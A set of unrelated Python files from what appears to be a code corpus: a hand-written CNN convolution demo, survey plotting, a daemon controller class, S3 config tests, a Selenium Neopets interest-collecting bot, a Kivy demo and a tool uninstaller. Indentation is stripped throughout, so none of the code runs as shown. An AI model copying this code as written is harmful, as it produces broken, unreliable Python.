numFilts = filt.shape[0] #number of filters we are given
filtDim = filt.shape[1] #dimensions of the filters
output = np.zeros((w-int((filtDim-1)/2), h-int((filtDim-1)/2))) #output array init to zeros
#Prerequisites for the convolution function to work correctly
if(filt.shape[1] != filt.shape[2]): #filter width and height must be the same
print("Width and height of filter aren't equal")
sys.exit()
if(filtDim%2==0): #there is no center pixel in the filter if it does not have odd dimensions
print("Filter must have odd dimensions")
sys.exit()
for f in range(numFilts): #for each of the filters
currF = filt[f, :] #get the current filter
for r in range(h-filtDim-1): #move the filter vertically down the image
for c in range(w-filtDim-1): #move the filter horizontally across the image
output[c,r] = np.sum(img[c:c+filtDim, r:r+filtDim]*currF[:,:]) + output[c,r]
'''For the above line:
img[c:c+filtDim, r:r+filtDim]*currF[:,:] multiplies the current filter with
the image area and then np.sum sums up the resulting array.
Since there could be more than one filter, we add up the values from all
the filters to get the combined result.
'''
return output
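#Conceptual note on convolution above: each filter slides across the padded image;
#at every position the element-wise product of the filter and the window under it
#is summed into one output pixel, so large responses mark patches that resemble
#the filter (e.g. the vertical-line filter fires along vertical strokes). With
#several filters, their response maps are simply added together here.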
def doConv(img, imgNum, filtMd, filtLg): #different iterations of the program
if(imgNum-1 in range(4)):
print("Using function number",imgNum)
else:
print("Function number not defined")
sys.exit()
if(imgNum == 1): #Image 1 Start
print("convolution layer 1")
for j in range(2): #2 convolutions with large filters
print("Large running")
img = convolution(img, filtLg)
for j in range(2): #2 convolutions with medium filters
print("Medium running")
img = convolution(img, filtMd)
print("Pooling")
img = maxPool(img) #Max pool
print("ReLU")
img = ReLU(img) #ReLU
print("convolution layer 2")
for j in range(2): #2 convolutions with large filters
print("Large running")
img = convolution(img, filtLg)
for j in range(2): #2 convolutions with medium filters
print("Medium running")
img = convolution(img, filtMd)
print("Single Convolution - Large")
img = convolution(img, filtLg) #1 convolution with large filters
print("Pooling")
img = maxPool(img) #Max pool
print("ReLU")
img = ReLU(img) #ReLU
#End Image 1
elif(imgNum == 2): #Image 2 Start
for i in range(3): #3x loop Start
print("convolution layer", i+1)
print("Large running")
img = convolution(img, filtLg) #1 convolution with large filters
print("Medium running")
img = convolution(img, filtMd) #1 convolution with medium filters
print("Pooling")
img = maxPool(img) #Max pool
#End 3x loop
for i in range(2): #2x loop Start
print("convolution layer", i+4)
print("Large running")
img = convolution(img, filtLg) #1 convolution with large filters
print("Medium running")
img = convolution(img, filtMd) #1 convolution with medium filters
print("Pooling")
img = maxPool(img) #Max pool
#End 2x Loop
#End Image 2
elif(imgNum == 3): #Image 3 Start
img = invertImg(img) #re-invert image because of the output of one layer
diagonals = np.zeros((2, 5, 5)) #new array for filters for diagonals
diagonals[0, :, :] = np.array([[[ 1, .25, -1, -1, -1],
[.25, 1, .25, -1, -1],
[ -1, .25, 1, .25, -1],
[ -1, -1, .25, 1, .25],
[ -1, -1, -1, .25, 1]]])
for y in range(5):
for x in range(5):
diagonals[1, x, y] = diagonals[0, y, 4-x]
print("Single Convolution - Large")
img = convolution(img, diagonals) #1 convolution with large filters
#End Image 3
elif(imgNum == 4): #Image 4 Start
for i in range(2): #2x Loop Start
print("convolution layer",i+1)
for j in range(2): #2 convolutions with large filters
print("Large running")
img = convolution(img, filtLg)
for j in range(2): #2 convolutions with medium filters
print("Medium running")
img = convolution(img, filtMd)
print("Pooling")
img = maxPool(img) #Max pool
#End 2x Loop
print("ReLU")
img = ReLU(img) #ReLU
print("convolution layer 3")
for j in range(2): #2 convolutions with large filters
print("Large running")
img = convolution(img, filtLg)
for j in range(2): #2 convolutions with medium filters
print("Medium running")
img = convolution(img, filtMd)
print("Pooling")
img = maxPool(img) #Max pool
print("Single Convolution - Large")
img = convolution(img, filtLg) #1 convolution with large filters
print("Pooling")
img = maxPool(img) #Max pool
print("ReLU")
img = ReLU(img) #ReLU
return img
def setFilt(size):
if(size == "Md"):
filt = np.zeros((4, 3, 3)) #array for the medium filters (straight lines)
filt[0, :,:] = np.array([[[ -1, .25, 1], #vertical line
[ -1, .25, 1],
[ -1, .25, 1]]])
filt[1,:,:] = np.array([[[ 1, 1, 1], #horizontal line
[.25, .25, .25],
[ -1, -1, -1]]])
filt[2,:,:] = np.array([[[ 1, .25, -1], #diagonal line (negative slope)
[.25, 1, .25],
[ -1, .25, 1]]])
filt[3,:,:] = np.array([[[ -1, .25, 1], #diagonal line (positive slope)
[.25, 1, .25],
[ 1, .25, -1]]])
elif(size == "Lg"):
filt = np.zeros((6, 5, 5)) #array for large filters (curves and long diagonals)
filt[0, :, :] = np.array([[[ 1, .25, -1, -1, -1], #long diagonal line (negative slope)
[.25, 1, .25, -1, -1],
[ -1, .25, 1, .25, -1],
[ -1, -1, .25, 1, .25],
[ -1, -1, -1, .25, 1]]])
for y in range(5):
for x in range(5):
filt[1, x, y] = filt[0, y, 4-x] #long diagonal line (positive slope)
filt[2, :, :] = np.array([[[ 1, 1, .25, .10, -1], #curve (from top, right then down)
[.25, .25, 1, .25, .10],
[.10, .10, .25, 1, .25],
[ -1, .05, .10, .25, 1],
[ -1, -1, .10, .25, 1]]])
for y in range(5):
for x in range(5):
filt[3, x, y] = filt[2, y, 4-x] #curve (from bottom, up then right)
for y in range(5):
for x in range(5):
filt[4, x, y] = filt[2, 4-y, x] #curve (from bottom, right then up)
for y in range(5):
for x in range(5):
filt[5, x, y] = filt[4, 4-y, x] #curve (from top, down then right)
else:
print("Filter Size not Defined")
sys.exit()
return filt
def comparisonPlot(img, n1, n2, n3, n4): #plots a side-by-side of four different outputs
fig, axarr = plt.subplots(2, 2) #2x2 array of images to be displayed
img1, img2, img3, img4 = img.copy(), img.copy(), img.copy(), img.copy() #copies so in-place functions don't interfere between algorithms
axarr[0, 0].imshow(doConv(img1, n1, setFilt("Md"), setFilt("Lg")), "gist_heat") #plot image 1
axarr[0, 0].set_title('Image 1') #label image 1
axarr[0, 1].imshow(doConv(img2, n2, setFilt("Md"), setFilt("Lg")), "gist_heat") #plot image 2
axarr[0, 1].set_title('Image 2') #label image 2
axarr[1, 0].imshow(doConv(img3, n3, setFilt("Md"), setFilt("Lg")), "gist_heat") #plot image 3
axarr[1, 0].set_title('Image 3') #label image 3
axarr[1, 1].imshow(doConv(img4, n4, setFilt("Md"), setFilt("Lg")), "gist_heat") #plot image 4
axarr[1, 1].set_title('Image 4') #label image 4
fig.subplots_adjust(hspace=0.5) #adjust the space between the images
plt.show() #display the images
def main(): #master function to manage subfunctions above, read, and write
#read in the original image
originalImg = mpimg.imread(DIR)
plt.imshow(originalImg) #plots the original image
img = originalImg[:, :, 0] #gets one layer of the image since it is black and white
img = invertImg(img) #inverts image so black is large numbers and white is small numbers
img = doConv(img, 1, setFilt("Md"), setFilt("Lg")) #does the pre-defined functions
#currently in range [1,4]
plt.imshow(img, "gist_heat") #plots the feature-detection image with red filter
comparisonPlot(img, 1, 2, 3, 4) #side-by-side comparison of four images with red filter
main() #runs the main function
``` |
{
"source": "JoshEHenderson/SQL-ETL-Visualization",
"score": 3
} |
#### File: JoshEHenderson/SQL-ETL-Visualization/SQL_Data_Visualization.py
```python
import pandas as pd
import matplotlib.pyplot as plt
import datetime as dt
# roundMin is passed a date with type datetime
# roundMin returns the date rounded down to the minute (sets the value of date.second to 0)
def roundMin(date):
return dt.datetime(date.year, date.month, date.day, date.hour, date.minute, 0)
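# Example: roundMin(dt.datetime(2021, 3, 4, 10, 30, 45)) -> datetime(2021, 3, 4, 10, 30, 0)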
dw_df = pd.read_csv("dw_df.csv") # read in data from file 'dw_df.csv' on the current working directory
dw_df = dw_df.drop(['Unnamed: 0'], axis = 1) # drop the index column created by the writing to a csv
# when stored and read, datetime gets converted to an object, so put back into datetime format
dw_df['creationDate'] = pd.to_datetime(dw_df['creationDate'])
# round creation date down to the nearest minute to make graphs more readable
dw_df['creationDate'] = [roundMin(dw_df['creationDate'][i]) for i in range( len(dw_df) )]
# ##################
# Analyze
# ##################
study3_df = dw_df[dw_df.studyID == 3] # create a new dataframe with only survey 3 data
plt.hist(study3_df['response'], range(1, 8)) # plot the responses in a histogram
plt.title('Responses Over All Factors') # title the histogram
plt.show() # display the histogram
for fact in set(study3_df['factorName']): # loop through the factors present
# create a new dataframe to work with that stores creationDate along with average response
# average responses are grouped by minutes since we rounded to the nearest minute earlier
curr_df = study3_df[study3_df.factorName == fact].groupby(['creationDate'], as_index = False).agg({'response':'mean'})
plt.plot(curr_df['creationDate'], curr_df['response'] ) # plot the average responses by creationDate
plt.title(fact) # title the graph with the current factor
plt.show() # display plot
``` |
{
"source": "joshehlinger/bandoleers",
"score": 2
} |
#### File: joshehlinger/bandoleers/setup.py
```python
import os.path
import setuptools
import bandoleers
def read_requirements(name):
requirements = []
try:
with open(os.path.join('requires', name)) as req_file:
for line in req_file:
if '#' in line:
line = line[:line.index('#')]
line = line.strip()
if line.startswith('-r'):
requirements.extend(read_requirements(line[2:].strip()))
elif line and not line.startswith('-'):
requirements.append(line)
except IOError:
pass
return requirements
setuptools.setup(
name='bandoleers',
description='AWeber development tool belt',
long_description='\n'+open('README.rst').read(),
version=bandoleers.__version__,
packages=setuptools.find_packages(exclude=['tests', 'tests.*']),
license='BSD',
url='https://github.com/aweber/bandoleers',
author='<NAME> <EMAIL>, <EMAIL>.',
author_email='<EMAIL>',
install_requires=read_requirements('installation.txt'),
tests_require=read_requirements('testing.txt'),
entry_points={
'console_scripts': [
'prep-it=bandoleers.prepit:run',
'wait-for=bandoleers.waitfor:run',
],
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
)
``` |
{
"source": "joshehlinger/helper",
"score": 3
} |
#### File: helper/helper/controller.py
```python
import logging
import logging.config
import os
import multiprocessing
import platform
try:
import queue
except ImportError:
import Queue as queue
import signal
import sys
import time
from helper import config, __version__
LOGGER = logging.getLogger(__name__)
class Controller(object):
"""Extend this class to implement your core application controller. Key
methods to implement are Controller.setup, Controller.process and
Controller.cleanup.
If you do not want to use the sleep/wake structure but rather something
like a blocking IOLoop, overwrite the Controller.run method.
"""
APPNAME = sys.argv[0].split(os.sep)[-1]
VERSION = __version__
#: When shutting down, how long should sleeping block the interpreter while
#: waiting for the state to indicate the class is no longer active.
SLEEP_UNIT = 0.5
#: How often should :meth:`Controller.process` be invoked
WAKE_INTERVAL = 60
#: Initializing state is only set during initial object creation
STATE_INITIALIZING = 0x01
#: When helper has set the signal timer and is paused, it will be in the
#: sleeping state.
STATE_SLEEPING = 0x02
#: The idle state is available to implementing classes to indicate that
#: while they are not actively performing tasks, they are not sleeping.
#: Objects in the idle state can be shutdown immediately.
STATE_IDLE = 0x03
#: The active state should be set whenever the implementing class is
#: performing a task that can not be interrupted.
STATE_ACTIVE = 0x04
#: The stop requested state is set when a signal is received indicating the
#: process should stop. The app will invoke the :meth:`Controller.stop`
#: method which will wait for the process state to change from STATE_ACTIVE
STATE_STOP_REQUESTED = 0x05
#: Once the application has started to shutdown, it will set the state to
#: stopping and then invoke the :meth:`Controller.stopping` method.
STATE_STOPPING = 0x06
#: Once the application has fully stopped, the state is set to stopped.
STATE_STOPPED = 0x07
# For reverse lookup
_STATES = {0x00: 'None',
0x01: 'Initializing',
0x02: 'Sleeping',
0x03: 'Idle',
0x04: 'Active',
0x05: 'Stop Requested',
0x06: 'Stopping',
0x07: 'Stopped'}
# Default state
_state = 0x00
def __init__(self, args, operating_system):
"""Create an instance of the controller passing in the debug flag,
the options and arguments from the cli parser.
:param argparse.Namespace args: Command line arguments
:param str operating_system: Operating system name from helper.platform
"""
self.set_state(self.STATE_INITIALIZING)
self.args = args
try:
self.config = config.Config(args.config)
except ValueError:
sys.exit(1)
self.debug = args.foreground
logging.config.dictConfig(self.config.logging)
self.operating_system = operating_system
self.pending_signals = multiprocessing.Queue()
@property
def current_state(self):
"""Property method that return the string description of the runtime
state.
:rtype: str
"""
return self._STATES[self._state]
@property
def is_active(self):
"""Property method that returns a bool specifying if the process is
currently active.
:rtype: bool
"""
return self._state == self.STATE_ACTIVE
@property
def is_idle(self):
"""Property method that returns a bool specifying if the process is
currently idle.
:rtype: bool
"""
return self._state == self.STATE_IDLE
@property
def is_initializing(self):
"""Property method that returns a bool specifying if the process is
currently initializing.
:rtype: bool
"""
return self._state == self.STATE_INITIALIZING
@property
def is_running(self):
"""Property method that returns a bool specifying if the process is
currently running. This will return true if the state is active, idle
or initializing.
:rtype: bool
"""
return self._state in [self.STATE_ACTIVE,
self.STATE_IDLE,
self.STATE_INITIALIZING]
@property
def is_sleeping(self):
"""Property method that returns a bool specifying if the process is
currently sleeping.
:rtype: bool
"""
return self._state == self.STATE_SLEEPING
@property
def is_stopped(self):
"""Property method that returns a bool specifying if the process is
stopped.
:rtype: bool
"""
return self._state == self.STATE_STOPPED
@property
def is_stopping(self):
"""Property method that returns a bool specifying if the process is
stopping.
:rtype: bool
"""
return self._state == self.STATE_STOPPING
@property
def is_waiting_to_stop(self):
"""Property method that returns a bool specifying if the process is
waiting for the current process to finish so it can stop.
:rtype: bool
"""
return self._state == self.STATE_STOP_REQUESTED
def on_configuration_reloaded(self):
"""Override to provide any steps when the configuration is reloaded."""
LOGGER.debug('%s.on_configuration_reloaded() NotImplemented',
self.__class__.__name__)
def on_shutdown(self):
"""Override this method to cleanly shutdown the application."""
LOGGER.debug('%s.cleanup() NotImplemented', self.__class__.__name__)
def on_sigusr1(self):
"""Called when SIGUSR1 is received, does not have any attached
behavior. Override to implement a behavior for this signal.
"""
LOGGER.debug('%s.on_sigusr1() NotImplemented', self.__class__.__name__)
def on_sigusr2(self):
"""Called when SIGUSR2 is received, does not have any attached
behavior. Override to implement a behavior for this signal.
"""
LOGGER.debug('%s.on_sigusr2() NotImplemented', self.__class__.__name__)
def process(self):
"""To be implemented by the extending class. Is called after every
sleep interval in the main application loop.
"""
raise NotImplementedError
def process_signal(self, signum):
"""Invoked whenever a signal is added to the stack.
:param int signum: The signal that was added
"""
if signum == signal.SIGTERM:
LOGGER.info('Received SIGTERM, initiating shutdown')
self.stop()
elif signum == signal.SIGHUP:
LOGGER.info('Received SIGHUP')
if self.config.reload():
LOGGER.info('Configuration reloaded')
logging.config.dictConfig(self.config.logging)
self.on_configuration_reloaded()
elif signum == signal.SIGUSR1:
self.on_sigusr1()
elif signum == signal.SIGUSR2:
self.on_sigusr2()
def run(self):
"""The core method for starting the application. Will setup logging,
toggle the runtime state flag, block on loop, then call shutdown.
Redefine this method if you intend to use an IO Loop or some other
long running process.
"""
LOGGER.info('%s v%s started', self.APPNAME, self.VERSION)
self.setup()
while not any([self.is_stopping, self.is_stopped]):
self.set_state(self.STATE_SLEEPING)
try:
signum = self.pending_signals.get(True, self.wake_interval)
except queue.Empty:
pass
else:
self.process_signal(signum)
if any([self.is_stopping, self.is_stopped]):
break
self.set_state(self.STATE_ACTIVE)
self.process()
def start(self):
"""Important:
Do not extend this method, rather redefine Controller.run
"""
for signum in [signal.SIGHUP, signal.SIGTERM,
signal.SIGUSR1, signal.SIGUSR2]:
signal.signal(signum, self._on_signal)
self.run()
def set_state(self, state):
"""Set the runtime state of the Controller. Use the internal constants
to ensure proper state values:
- :attr:`Controller.STATE_INITIALIZING`
- :attr:`Controller.STATE_ACTIVE`
- :attr:`Controller.STATE_IDLE`
- :attr:`Controller.STATE_SLEEPING`
- :attr:`Controller.STATE_STOP_REQUESTED`
- :attr:`Controller.STATE_STOPPING`
- :attr:`Controller.STATE_STOPPED`
:param int state: The runtime state
:raises: ValueError
"""
if state == self._state:
return
elif state not in self._STATES.keys():
raise ValueError('Invalid state {}'.format(state))
# Check for invalid transitions
if self.is_waiting_to_stop and state not in [self.STATE_STOPPING,
self.STATE_STOPPED]:
LOGGER.warning('Attempt to set invalid state while waiting to '
'shutdown: %s ', self._STATES[state])
return
elif self.is_stopping and state != self.STATE_STOPPED:
LOGGER.warning('Attempt to set invalid post shutdown state: %s',
self._STATES[state])
return
elif self.is_running and state not in [self.STATE_ACTIVE,
self.STATE_IDLE,
self.STATE_SLEEPING,
self.STATE_STOP_REQUESTED,
self.STATE_STOPPING]:
LOGGER.warning('Attempt to set invalid post running state: %s',
self._STATES[state])
return
elif self.is_sleeping and state not in [self.STATE_ACTIVE,
self.STATE_IDLE,
self.STATE_STOP_REQUESTED,
self.STATE_STOPPING]:
LOGGER.warning('Attempt to set invalid post sleeping state: %s',
self._STATES[state])
return
LOGGER.debug('State changed from %s to %s',
self._STATES[self._state], self._STATES[state])
self._state = state
def setup(self):
"""Override to provide any required setup steps."""
LOGGER.debug('%s.setup() NotImplemented', self.__class__.__name__)
def shutdown(self):
"""Override to provide any required shutdown steps."""
LOGGER.debug('%s.shutdown() NotImplemented', self.__class__.__name__)
def stop(self):
"""Override to implement shutdown steps."""
LOGGER.info('Attempting to stop the process')
self.set_state(self.STATE_STOP_REQUESTED)
# Call shutdown for classes to add shutdown steps
self.shutdown()
# Wait for the current run to finish
while self.is_running and self.is_waiting_to_stop:
LOGGER.info('Waiting for the process to finish')
time.sleep(self.SLEEP_UNIT)
# Change the state to shutting down
if not self.is_stopping:
self.set_state(self.STATE_STOPPING)
# Call a method that may be overwritten to cleanly shutdown
self.on_shutdown()
# Change our state
self.set_state(self.STATE_STOPPED)
@property
def system_platform(self):
"""Return a tuple containing the operating system, python
implementation (CPython, pypy, etc), and python version.
:rtype: tuple(str, str, str)
"""
return (self.operating_system,
platform.python_implementation(),
platform.python_version())
@property
def wake_interval(self):
"""Property method that returns the wake interval in seconds.
:rtype: int
"""
return (self.config.application.get('wake_interval') or
self.WAKE_INTERVAL)
def _on_signal(self, signum, _frame):
"""Append the signal to the queue, to be processed by the main."""
self.pending_signals.put(signum)
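# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the original
# module). The class docstring above says to extend Controller and override
# setup/process, so a minimal subclass might look like the commented example
# below. The names MyController and counter are assumptions, not helper API.
#
# class MyController(Controller):
#     WAKE_INTERVAL = 10            # invoke process() every 10 seconds
#
#     def setup(self):
#         self.counter = 0          # one-time initialisation
#
#     def process(self):
#         self.counter += 1         # work performed on every wake-up
#
#     def on_shutdown(self):
#         LOGGER.info('processed %d wake-ups', self.counter)
# ---------------------------------------------------------------------------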
```
#### File: helper/tests/config_tests.py
```python
import json
import os
import unittest
import uuid
import boto3
from helper import config
class ConfigDefaultTests(unittest.TestCase):
def setUp(self):
self.config = config.Config()
def test_application(self):
self.assertDictEqual(self.config.application, config.APPLICATION)
def test_daemon(self):
self.assertDictEqual(self.config.daemon, config.DAEMON)
def test_logging(self):
self.assertDictEqual(self.config.logging, config.LOGGING)
class RemoteConfigTests(unittest.TestCase):
def setUp(self):
self.value = {
'Application': {
'key': str(uuid.uuid4())
},
'Daemon': {
'user': str(uuid.uuid4()),
'group': str(uuid.uuid4())
},
'Logging': {
'disable_existing_loggers': False,
'incremental': True}
}
self.bucket = str(uuid.uuid4())
client = boto3.client('s3', endpoint_url=os.environ['S3_ENDPOINT'])
client.create_bucket(Bucket=self.bucket)
client.put_object(
Bucket=self.bucket, Key='test.json',
Body=json.dumps(self.value),
ACL='public-read')
def test_loaded_config(self):
cfg = config.Config('{}/{}/test.json'.format(
os.environ['S3_ENDPOINT'], self.bucket))
for key in self.value['Application'].keys():
self.assertEqual(cfg.application[key],
self.value['Application'][key])
for key in self.value['Daemon'].keys():
self.assertEqual(cfg.daemon[key],
self.value['Daemon'][key])
for key in self.value['Logging'].keys():
self.assertEqual(cfg.logging[key],
self.value['Logging'][key])
def test_value_error_raised_for_missing_file(self):
with self.assertRaises(ValueError):
config.Config('{}/{}/{}.json'.format(os.environ['S3_ENDPOINT'],
self.bucket, uuid.uuid4()))
class S3ConfigTests(RemoteConfigTests):
def test_loaded_config(self):
cfg = config.Config('s3://{}/test.json'.format(self.bucket))
for key in self.value['Application'].keys():
self.assertEqual(cfg.application[key],
self.value['Application'][key])
for key in self.value['Daemon'].keys():
self.assertEqual(cfg.daemon[key],
self.value['Daemon'][key])
for key in self.value['Logging'].keys():
self.assertEqual(cfg.logging[key],
self.value['Logging'][key])
def test_value_error_raised_for_missing_file(self):
with self.assertRaises(ValueError):
config.Config('s3://{}/{}.json'.format(self.bucket, uuid.uuid4()))
``` |
{
"source": "joshehlinger/neobanker",
"score": 3
} |
#### File: joshehlinger/neobanker/banker.py
```python
import time
import sys
import argparse
import datetime
from selenium import webdriver
def collect_interest(config):
options = webdriver.ChromeOptions()
options.add_argument('headless')
driver = webdriver.Chrome(options=options)
try:
print ('Run starting at {}'.format(str(datetime.datetime.now())))
driver.get('http://www.neopets.com/bank.phtml')
# Login
print('Logging in...')
login_form = driver.find_element_by_class_name('welcomeLoginContent')
username_login = login_form.find_element_by_name('username')
password_login = login_form.find_element_by_name('password')
username_login.clear()
username_login.send_keys(config.username)
password_login.clear()
password_login.send_keys(config.password)
login_button = driver.find_element_by_class_name('welcomeLoginButton')
login_button.click()
print('Login successful')
# Collect interest
interest_button = driver.find_element_by_css_selector("input[value^='Collect Interest']")
driver.execute_script("arguments[0].scrollIntoView();", interest_button)
interest_button.click()
print('Collected Interest!')
time.sleep(1)
driver.quit()
return 0
except Exception as e:
print(e)
driver.quit()
return 1
def arg_parser() -> argparse.ArgumentParser:
desc = 'Collect that interest'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('--username',
dest='username',
metavar='',
help='username')
parser.add_argument('--password',
dest='password',
metavar='',
help='password')
return parser
def main(args=None):
parser = arg_parser()
config = parser.parse_args(args=args)
if config.username is None or config.password is None:
print('Username and Password are required!')
return 1
return collect_interest(config)
if __name__ == '__main__':
sys.exit(main())
``` |
{
"source": "joshem/Autopen2",
"score": 3
} |
#### File: old/testkivy/main.py
```python
import kivy
kivy.require('1.9.0')
from cheesepoofs.kerplunk import script
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.button import Button
from kivy.lang import Builder
from kivy.animation import Animation
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.image import Image
from kivy.uix.textinput import TextInput
from kivy.graphics import Color, Rectangle
Builder.load_string('''
<Marvel>
Label:
id: loki
text: 'loki: I AM YOUR GOD!'
Button:
id: hulk
text: "press to smash loki"
on_release: root.hulk_smash()
''')
class Marvel(BoxLayout):
def hulk_smash(self):
self.ids.hulk.text = "hulk: puny god!"
self.ids["loki"].text = "loki: >_<!!!" # alternative syntax
script.install_script()
class AutoPen(App):
def build(self):
#with open("tips.txt", "r") as stream:
# labeltext = stream.read()
label = Label(text="[size=50]hi[/size]", markup=True)
box = BoxLayout()
marvell = Marvel()
box.add_widget(marvell)
box.add_widget(label)
return box
class Anima(App):
def build(self):
floater = FloatLayout()
self.widget = Button(text='herpderp', pos = (200,200), size_hint=(0.2,0.2))
self.backbutton = Button(text='back', pos=(0,0), size_hint =(0.1,0.2))
self.widget.bind(on_press=self.animate)
self.backbutton.bind(on_press=self.back)
floater.add_widget(self.widget)
floater.add_widget(self.backbutton)
return floater
def animate(self, widgetself):
anim = Animation(x=100, y=100)
anim.start(self.widget)
def back(self,widgetself):
anim = Animation(x=200,y=200)
anim.start(self.widget)
class Loading(App):
def build(self):
floater = FloatLayout()
logo = Image(source='AutoPen.png', pos_hint={'center_x': 0.5, 'center_y': .6})
spiderman = Label(
text='[size=24][i]With Great Power comes Great Responsibility[/i][/size]',
markup=True,
pos_hint={'center_x': 0.5, 'center_y': .2})
enter = Button(text='enter', size_hint=(0.2,0.1), pos_hint={'center_x': 0.5, 'center_y': .1})
floater.add_widget(logo)
floater.add_widget(spiderman)
floater.add_widget(enter)
return floater
class Textboox(App):
def build(self):
        floater = FloatLayout()
        return floater  # return the (currently empty) layout so build() yields a root widget
if __name__ == "__main__":
Loading().run()
```
#### File: joshem/Autopen2/uninstall.py
```python
import general_use
import dependencies
import tools
import subprocess
import os
def uninstall(toolname):
repo_canbus_utils = 'https://github.com/digitalbond/canbus-utils.git'
repo_kayak = 'https://github.com/dschanoeh/Kayak.git'
repo_caringcaribou = 'https://github.com/CaringCaribou/caringcaribou.git' #want to check this to make sure it works, instructions a bit unclear
repo_c0f = 'https://github.com/zombieCraig/c0f.git'
repo_udsim = 'https://github.com/zombieCraig/UDSim.git'
repo_j1939 = 'https://github.com/wang701/can-utils-j1939.git'
repo_canbadger = 'https://github.com/Gutenshit/CANBadger.git'
repo_canbadger_server = 'https://github.com/Gutenshit/CANBadger-Server.git'
repo_katoolin = 'https://github.com/LionSec/katoolin.git'
repo_bluelog = 'https://github.com/MS3FGX/Bluelog.git'
repo_bluemaho = 'https://github.com/zenware/bluemaho.git'
link_pyobd = 'http://www.obdtester.com/download/pyobd_0.9.3.tar.gz' #this might not work
link_o2oo = 'https://www.vanheusden.com/O2OO/O2OO-0.9.tgz'
link_romraider = 'http://assembla.com/spaces/romraider/documents/a5Ao9gHEir5P9Udmr6QqzO/download/RomRaider0.5.9RC3-linux.jar'
d = general_use.check_distribution()
pack_man = general_use.package_tool(d)
rm_rc = -1
#check path to make sure it's in the autopen directory
curr = os.getcwd()
back_index = curr.rfind('/')
ap_index = curr.find('autopen')
if curr[back_index:] != '/autopen':
path = curr[:ap_index+7]
else:
path = curr
os.chdir(path)
try:
if toolname == 'canbus-utils':
rm_rc = subprocess.run(['rm', '-rf', 'canbus-utils']).returncode
elif toolname == 'Kayak':
rm_rc = subprocess.run(['rm', '-rf', 'Kayak']).returncode
elif toolname == 'caringcaribou':
rm_rc = subprocess.run(['rm', '-rf', 'caringcaribou']).returncode
elif toolname == 'c0f':
rm_rc = subprocess.run(['rm', '-rf', 'c0f']).returncode
elif toolname == 'udsim':
rm_rc = subprocess.run(['rm', '-rf', 'UDSim']).returncode
elif toolname == 'katoolin':
rm_rc = subprocess.run(['rm', '-rf', 'katoolin']).returncode
elif toolname == 'bluelog':
rm_rc = subprocess.run(['rm', '-rf', 'Bluelog']).returncode
elif toolname == 'bluemaho':
rm_rc = subprocess.run(['rm', '-rf', 'bluemaho']).returncode
elif toolname == 'j1939':
rm_rc = subprocess.run(['rm', '-rf', 'can-utils-j1939']).returncode
elif toolname == 'canbadger-hw':
rm_rc = subprocess.run(['rm', '-rf', 'CANBadger']).returncode
#https://github.com/Gutenshit/CANBadger/wiki/Getting-the-board-ready
elif toolname == 'canbadger-sw':
rm_rc = subprocess.run(['rm', '-rf', 'CANBadger-Server']).returncode
elif toolname == 'pyobd':
try:
rm_rc = subprocess.run(['rm', '-rf','pyobd_0.9.3.tar.gz']).returncode
except:
pass
try:
                rm_rc = subprocess.run(['rm', '-rf', 'pyobd-0.9.3']).returncode
except:
pass
elif toolname == 'o2oo':
try:
rm_rc = subprocess.run(['rm', '-rf','O2OO-0.9.tgz']).returncode
except:
pass
try:
                rm_rc = subprocess.run(['rm', '-rf', 'O2OO-0.9']).returncode
except:
pass
elif toolname == 'btscanner':
rm_rc = subprocess.run(['sudo', pack_man, 'purge', '-y','btscanner']).returncode
elif toolname == 'gnuradio':
rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'gnuradio']).returncode
elif toolname == 'aircrack-ng':
rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'aircrack-ng']).returncode
elif toolname == 'gqrx':
rm_rc = subprocess.run(['sudo', pack_man, 'purge', '-y','gqrx']).returncode
elif toolname == 'can-utils':
rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'can-utils']).returncode
elif toolname == 'wireshark':
rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'wireshark']).returncode
elif toolname == 'tshark':
rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'tshark']).returncode
except:
print ('Not in correct directory')
print ('current directory is: ', os.getcwd())
pass
if rm_rc == 0:
#remove the tool from the text file
f = open("installed.txt","r+")
d = f.readlines()
f.seek(0)
for i in d:
            if i.strip() != toolname:  # strip the trailing newline so matching entries are removed
f.write(i)
f.truncate()
print ('UNINSTALL SUCCESSFUL: Successfully uninstalled', toolname)
return rm_rc
def test(name):
return 0
``` |
{
"source": "joshembree/ml-viz",
"score": 3
} |
#### File: joshembree/ml-viz/app.py
```python
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.graph_objs as go
import plotly.express as px
from plotly.subplots import make_subplots
import pandas as pd
import numpy as np
import example_figures as example
import roc_fig
figs = {
'ROC Curves': roc_fig.fig,
'Example Scatter': example.scatter,
'Example Histogram': example.histogram
}
app = dash.Dash()
#fig_names = ['scatter', 'histogram']
fig_names = list(figs.keys())
fig_dropdown = html.Div([
dcc.Dropdown(
id='fig_dropdown',
options=[{'label': x, 'value': x} for x in fig_names],
value=None
)])
fig_plot = html.Div(id='fig_plot')
app.layout = html.Div([fig_dropdown, fig_plot])
@app.callback(
dash.dependencies.Output('fig_plot', 'children'),
[dash.dependencies.Input('fig_dropdown', 'value')])
def update_output(fig_name):
return name_to_figure(fig_name)
def name_to_figure(fig_name):
figure = go.Figure()
for name in fig_names:
if fig_name == name:
figure = figs[name]
return dcc.Graph(figure=figure)
app.run_server(debug=True, use_reloader=False)
``` |
{
"source": "joshenders/git-stacktrace",
"score": 2
} |
#### File: git_stacktrace/tests/base.py
```python
import fixtures
import testtools
class TestCase(testtools.TestCase):
def setUp(self):
super(TestCase, self).setUp()
stdout = self.useFixture(fixtures.StringStream('stdout')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stdout', stdout))
stderr = self.useFixture(fixtures.StringStream('stderr')).stream
